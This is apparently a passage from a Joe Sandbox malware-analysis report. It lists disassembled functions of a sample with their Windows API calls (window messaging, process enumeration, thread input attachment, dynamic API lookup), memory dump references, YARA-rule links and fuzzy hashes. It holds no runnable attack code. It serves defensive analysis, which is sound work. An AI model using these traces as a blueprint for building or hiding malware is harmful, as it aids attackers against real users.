                                                                                                                                                                                                                                                                  • Opcode ID: be3689fea0c7a204e3c81c1a1aaa9ecec081fc1757ac1d09b5a9c4415897199a
                                                                                                                                                                                                                                                                  • Instruction ID: f8d7cf1965a255a50b47b27f69b964c6e9eb37e777baf9f93962c3eea90c19f3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be3689fea0c7a204e3c81c1a1aaa9ecec081fc1757ac1d09b5a9c4415897199a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE31AF396002019FCB10CF6CC985EAA77F1EF15328F288159E8168B3A2D771EE45CB71
                                                                                                                                                                                                                                                                  Function 00D74954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00D749DC
                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00D749F0
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00D74A14
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                  • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                  • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                  • Opcode ID: b96e67c0e7f9047acdb93951f176ac3e2acc93e4326dae195b6f0e40208d4581
                                                                                                                                                                                                                                                                  • Instruction ID: 25bb7081c2506fc68105d057d3bd50cbc037053f80ee7028ec504ef36267a39d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b96e67c0e7f9047acdb93951f176ac3e2acc93e4326dae195b6f0e40208d4581
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6721B132540219ABDF168F50CC46FEB3B69EF48718F154214FA19AB1D0E7B1A8519BA0
                                                                                                                                                                                                                                                                  Function 00D750F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00D751A3
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00D751B1
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D751B8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                  • String ID: msctls_updown32
                                                                                                                                                                                                                                                                  • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                  • Opcode ID: 7131b7caef4e83f2dd205f8e1b56e256a6c5f98c2b9471229d1952be42e7f24c
                                                                                                                                                                                                                                                                  • Instruction ID: e7295fb22d88301fad22520f83313296956190f7f6df119a9933c52d377f105f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7131b7caef4e83f2dd205f8e1b56e256a6c5f98c2b9471229d1952be42e7f24c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F218EB5600749AFDB10DF28DC81EBA37ADEF5A364B444149F9089B3A1DA70EC11DBB1
                                                                                                                                                                                                                                                                  Function 00D74253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00D742DC
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00D742EC
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00D74312
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                  • String ID: Listbox
                                                                                                                                                                                                                                                                  • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                  • Opcode ID: d25b50ca681d4e182e937d3534dc0f0aa42d0ed919cd0c6ca1a03efd87c012bd
                                                                                                                                                                                                                                                                  • Instruction ID: 559617e954900628dda24ae9a657ffd47aa5cbc2af694df4a6997c34c75b73c2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d25b50ca681d4e182e937d3534dc0f0aa42d0ed919cd0c6ca1a03efd87c012bd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8121B032600218BBEB128F94CC85FBB376EEF89764F158114F909AB191DB719C5287B0
                                                                                                                                                                                                                                                                  Function 00D55439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00D5544D
                                                                                                                                                                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00D554A1
                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,00D7DCD0), ref: 00D55515
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                  • String ID: %lu
                                                                                                                                                                                                                                                                  • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                  • Opcode ID: c5436150bf8615320866d6bec086473a4c56c23e78e37a94a0ff5207563d5627
                                                                                                                                                                                                                                                                  • Instruction ID: 1b50ca16c18c68f2df31c5012b0375acbe1eb95164438e41b1d8544aaa7be8bf
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5436150bf8615320866d6bec086473a4c56c23e78e37a94a0ff5207563d5627
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE315074A00209AFDB11DF54C885EAA77B9EF04305F1440A8F809DB362DB71EE45DB71
                                                                                                                                                                                                                                                                  Function 00D74C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00D74CED
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00D74D02
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00D74D0F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                                                  • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                  • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                  • Opcode ID: 723f67f2947c82e87c10d87f1c19ad123759131b90749d5e573e843dfd1e349d
                                                                                                                                                                                                                                                                  • Instruction ID: 3d3e239ef7414896081a37ec7276c0e496a917e999894c769174bae2885ac678
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 723f67f2947c82e87c10d87f1c19ad123759131b90749d5e573e843dfd1e349d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1110671240348BEEF225F65CC06FAB37ACEF85B64F114514FA59E21A0E671DC619B30
                                                                                                                                                                                                                                                                  Function 00D4389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE8577: _wcslen.LIBCMT ref: 00CE858A
                                                                                                                                                                                                                                                                    • Part of subcall function 00D436F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D43712
                                                                                                                                                                                                                                                                    • Part of subcall function 00D436F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D43723
                                                                                                                                                                                                                                                                    • Part of subcall function 00D436F4: GetCurrentThreadId.KERNEL32 ref: 00D4372A
                                                                                                                                                                                                                                                                    • Part of subcall function 00D436F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00D43731
                                                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 00D438C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4373B: GetParent.USER32(00000000), ref: 00D43746
                                                                                                                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00D4390F
                                                                                                                                                                                                                                                                  • EnumChildWindows.USER32(?,00D43987), ref: 00D43937
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                  • String ID: %s%d
                                                                                                                                                                                                                                                                  • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                  • Opcode ID: 9b742cc79734786edb93aebb12da29b704b1e8c6b3e88a114a98dc9db08a5762
                                                                                                                                                                                                                                                                  • Instruction ID: 423ff4573e17f1cf6f508a0b5e1063bea0f603dfb5b8fbde40f1eea79cd6c08c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b742cc79734786edb93aebb12da29b704b1e8c6b3e88a114a98dc9db08a5762
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4911E471600209ABDF01BF788C85AED77AAEF94300F048069BD4D9B292DF719949DB30
                                                                                                                                                                                                                                                                  Function 00D76321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00D76360
                                                                                                                                                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00D7638D
                                                                                                                                                                                                                                                                  • DrawMenuBar.USER32(?), ref: 00D7639C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: e3b3c86aed0169f33822e34aa248acd13a49d1a2f862c1c80ee1157fced5c0ca
                                                                                                                                                                                                                                                                  • Instruction ID: 977fa2046b383f23b7c0e562dcebf084810c5520a76797976ce8b919842d1b0c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3b3c86aed0169f33822e34aa248acd13a49d1a2f862c1c80ee1157fced5c0ca
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92015731500218AFDB219F11DC84BAABBB5FF45351F18C099F84ED6290EB308A85EF32
                                                                                                                                                                                                                                                                  Function 00D3E778 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00D3E797
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32 ref: 00D3E7BD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                  • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                  • API String ID: 3013587201-2590602151
                                                                                                                                                                                                                                                                  • Opcode ID: 01e9207c28e20c7e9a1b526ad0004208f62d4429452169a6cd716cfa6db29334
                                                                                                                                                                                                                                                                  • Instruction ID: 85e6f16c8e4a7d9991d147814b05fd1ae94d83468e333b21954c5b773aa08910
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01e9207c28e20c7e9a1b526ad0004208f62d4429452169a6cd716cfa6db29334
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0E092B19027659FE7B65A204C85FB933256F20B41F590968ED46F63D0EB30CD8886B5
                                                                                                                                                                                                                                                                  Function 00D4096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e1c74f0ea60a127628bcd498bb3a3c6f1063883a4e23dc7dbac2550235d537fb
                                                                                                                                                                                                                                                                  • Instruction ID: 07b8bb95c7c643022b44376cbe81e506479759036b2c4866cb05a31cc66fc23e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1c74f0ea60a127628bcd498bb3a3c6f1063883a4e23dc7dbac2550235d537fb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AC16F75A00216EFDB14CF94C894EAEBBB5FF48704F148598E605EB251D731EE81DBA0
                                                                                                                                                                                                                                                                  Function 00D141F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                  • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                  • Instruction ID: c9a8ed4c83bc8686f64bd23b22bb06b2cc028977c5e43312080627fb42f05cda
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11A16871900386BFDB22CF18E8917EEBBE4EF25314F28416DE5959B281CA7499C2C770
                                                                                                                                                                                                                                                                  Function 00D40D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00D80BD4,?), ref: 00D40EE0
                                                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00D80BD4,?), ref: 00D40EF8
                                                                                                                                                                                                                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,00D7DCE0,000000FF,?,00000000,00000800,00000000,?,00D80BD4,?), ref: 00D40F1D
                                                                                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 00D40F3E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 314563124-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9812ba1518a6fccf0946851e675aa510c7d34a1ad287a02126d1722a7d58c0fd
                                                                                                                                                                                                                                                                  • Instruction ID: 1f1aceccac60605510df8d4927536046b9c64d8fbc6e6b485e5cae0ed77cf496
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9812ba1518a6fccf0946851e675aa510c7d34a1ad287a02126d1722a7d58c0fd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F811D71A00109EFCB14DF94C984DEEBBB9FF89315F144568F606AB250DB71AE06CB60
                                                                                                                                                                                                                                                                  Function 00D6B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00D6B10C
                                                                                                                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00D6B11A
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00D6B1FC
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D6B20B
                                                                                                                                                                                                                                                                    • Part of subcall function 00CFE36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00D24D73,?), ref: 00CFE395
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
